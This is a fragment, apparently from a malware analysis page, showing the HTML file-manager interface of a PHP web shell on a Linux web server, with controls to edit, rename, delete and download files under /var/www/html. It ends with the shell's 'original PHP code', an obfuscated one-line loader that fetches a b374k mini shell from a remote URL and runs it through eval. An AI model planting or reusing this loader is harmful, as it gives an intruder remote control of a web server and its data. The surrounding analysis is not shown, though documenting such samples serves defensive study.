method="get" style="margin:8px 0 0 0;"></form> <input type="hidden" name="y" value="/var/www/html/"> <tr><td>view file/folder</td><td><input onmouseover="this.focus();" id="goto" class="inputz" type="text" name="view" style="width:400px;" value="/var/www/html/"><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;"></td></tr> </tbody></table><table class="explore"> <tbody><tr><th>name</th><th style="width:80px;">size</th><th style="width:210px;">owner:group</th><th style="width:80px;">perms</th><th style="width:110px;">modified</th><th style="width:190px;">actions</th></tr> <tr><td><a href="?y=/var/www/html/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:05</td><td><span id="titik1"><a href="?y=/var/www/html/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar('titik1','titik1_form');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" value="/var/www/html/"> <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder"> <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !"> </form></td></tr> <tr><td><a href="?y=/var/www/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:05</td><td><span id="titik2"><a href="?y=/var/www/html/&edit=/var/www/newfile.php">newfile</a> | <a href="javascript:tukar('titik2','titik2_form');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" value="/var/www/html/"> <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder"> <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !"> </form> </td></tr><tr><td><a id="403.php_link" href="?y=/var/www/html/&view=/var/www/html/403.php">403.php</a> <form action="?y=/var/www/html/" method="post" id="403.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="403.php" style="margin:0;padding:0;"> <input class="inputz" style="width:200px;" type="text" name="newname" value="403.php"> <input class="inputzbut" type="submit" name="rename" value="rename"> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('403.php_link','403.php_form');"> </form> </td><td>212</td><td style="text-align:center;">osboxes<span class="gaya"> : </span>osboxes</td><td>rw-rw-r--</td><td style="text-align:center;">12-Feb-2023 18:05</td> <td><a href="?y=/var/www/html/&edit=/var/www/html/403.php">edit</a> | <a href="javascript:tukar('403.php_link','403.php_form');">rename</a> | <a href="?y=/var/www/html/&delete=/var/www/html/403.php">delete</a> | <a href="?y=/var/www/html/&dl=/var/www/html/403.php">download</a> (<a href="?y=/var/www/html/&dlgzip=/var/www/html/403.php">gzip</a>)</td></tr><tr><td><a id="beneri.se_malware_analysis_link" href="?y=/var/www/html/&view=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a> <form action="?y=/var/www/html/" method="post" id="beneri.se_malware_analysis_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="beneri.se_malware_analysis" style="margin:0;padding:0;"> <input class="inputz" style="width:200px;" type="text" name="newname" value="beneri.se_malware_analysis"> <input class="inputzbut" type="submit" name="rename" value="rename"> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('beneri.se_malware_analysis_link','beneri.se_malware_analysis_form');"> </form> </td><td>???</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rw-r--r--</td><td style="text-align:center;">12-Feb-2023 18:05</td> <td><a href="?y=/var/www/html/&edit=/var/www/html/beneri.se_malware_analysis">edit</a> | <a href="javascript:tukar('beneri.se_malware_analysis_link','beneri.se_malware_analysis_form');">rename</a> | <a href="?y=/var/www/html/&delete=/var/www/html/beneri.se_malware_analysis">delete</a> | <a href="?y=/var/www/html/&dl=/var/www/html/beneri.se_malware_analysis">download</a> (<a href="?y=/var/www/html/&dlgzip=/var/www/html/beneri.se_malware_analysis">gzip</a>)</td></tr></tbody></table> </form></div> </body></html>Original PHP code
<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/NSAKEY/Top-103-shells/master/Top%20103%20shells/b374k-mini-shell-php.php.txt"));/**/?>